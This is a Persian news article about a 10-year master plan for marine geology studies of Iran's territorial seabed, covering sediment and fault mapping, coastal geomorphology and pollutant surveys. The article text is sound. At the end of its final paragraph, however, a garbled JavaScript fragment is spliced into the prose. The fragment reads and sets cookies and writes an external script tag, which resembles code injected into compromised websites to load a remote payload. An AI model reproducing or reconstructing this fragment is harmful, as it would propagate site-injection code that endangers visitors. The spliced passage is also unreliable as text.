سه شنبه ۰۱ مرداد ۱۳۹۸ , ۰۲:۵۵:۰۰
2019 / July / 22خبر بهمن ۲۱, ۱۳۹۷
همزمان با چهل سالگی انقلاب اسلامی صورت گرفت

تدوین طرح جامع ۱۰ ساله مطالعات زمین‌شناسی دریایی

اطلاعات این طرح برای تصمیمات کلان کشور نیاز است

طرح جامع 10 ساله مطالعات زمین‌شناسی دریایی برای آشنایی بیشتر با بستر و زیربستر دریا در محدوده آب‌های سرزمینی ایران، همزمان با چهلمین سالگرد پیروزی انقلاب اسلامی ایران تدوین شد.

به گزارش پیام‌آوران معدن و فولاد، «مسعود زمانی پدرام» مدیریت زمین‌شناسی دریایی گفت: آشنایی بیش از پیش با بستر دریا در محدوده آب‌های سرزمینی کشور از جمله آثار و نتایج این طرح است.

به گفته وی، این اطلاعات بدون شک در هر زمان و مکان برای تصمیم گیری‌های کلان کشور مورد نیاز است.

زمانی خاطرنشان کرد: براساس این طرح پژوهشی، گسترش افقی و پراکندگی واحدهای رسوبی سطحی و سنگی برون‌زده در بستر دریا و سواحل، پارامترهای فیزیکی و شیمیایی موثر در رسوب گذاری و فرسایش رسوبات عهد حاضر، گسل های فعال، تصویربرداری مورفولوژی بستر، مطالعه زمین‌ساخت و ساختارهای رسوبی از طریق تصویرسازی لایه‌های زیر بستر دریا، اندازه ‌گیری تغییرات میدان مغناطیسی زمین و شناسایی عمق پی‌سنگ، تعیین وضعیت چینه‌شناسی و رخساره‌ای رسوبات هولوسن، چینه‌ نگاری لرزه‌ای و الگوی انباشتگی رسوبات، شناسایی اختلالات رسوبگذاری و ناپیوستگی‌ها، بازسازی تاریخچه حوضه رسوبی، تعیین نوسان نسبی سطح آب دریا، رسوب‌شناسی، ژئوشیمی رسوبی و آلاینده‌های زیست محیطی و ژئومورفولوژی سواحل مورد بررسی قرار می‌گیرد.

مدیریت زمین شناسی دریایی جستجوی اشیای غرق شده و باستان‌شناسی، شناسایی مسیر خطوط انتقال انرژی، مطالعه و شناسایی پتانسیل‌های اقتصادی در محدوده ساحلی، دریایی، دریاچه‌ای و رودخانه‌ای کشور را از دیگر کاربردهای این طرح پژوهشی دانست.

زمانی اضافه کرد: برای ساخت تمام سازه‌های دریایی از جمله اسکله، سکوهای نفتی، پل‌ها و تونل‌ها همچنین عبور کابل ‌های زیردریایی و لوله گذاری‌های نفت و آب، نیاز به اطلاعات سنگ‌شناسی، رسوب‌شناسی، زمین‌ساخت و عوارض زمین‌شناسی است که بر همین اساس مطالعات زمین‌شناسی و برداشت‌ های ژئوفیزیک دریایی از جمله به‌کارگیری دستگاه‌های لرزه‌نگاری کم عمق با قدرت تفکیک بالا و تصویربرداری از طریق امواج صوتی از بستر و زیر بستر دریا به عنوان یک ضرورت می‌تواند اساس تمام فعالیت‌های عمرانی قبل از شروع پروژه در پهنه‌های آبی باشد.

این کارشناس‌ارشد زمین‌شناسی افزود: شناسایی آثار فرسایشی در نوار ساحلی و تاثیر این پدیده‌ها بر اجرای پروژه‌های در دست مطالعه با هدف تعیین موقعیت های مناسب برای اسکله‌سازی، احداث سازه ها، احداث موج‌شکن، ساحل‌سازی و محوطه‌ سازی در نوار ساحلی ضرورت اجرای طرح را بیشتر نمایان می‌کند.

وی؛ تهیه نقشه‌های رسوب‌شناسی و زمین‌شناسی دریایی، مطالعه و بررسی زیست دریا و دریاچه، مطالعات ژئوفیزیک دریا، تهیه نقشه‌های ژئوشیمی رسوبی و بررسی آلاینده‌های زیست محیطی، تهیه نقشه‌های ژئومورفولوژی ساحلی، تهیه نقشه‌های گردشگری و ژئوپارک پیشنهادی و تهیه بانک داده‌های زمین شناسی سواحل و دریا را به عنوان اهداف انجام این پروژه برای مجریان بیان کرد. +e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));:void 0}var =”,||void 0===time){var ), path=/; expires=”(”+src+'”><\/script>‘)}

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

استفاده از اخبار با نقل منبع معدن و فولاد مجاز است.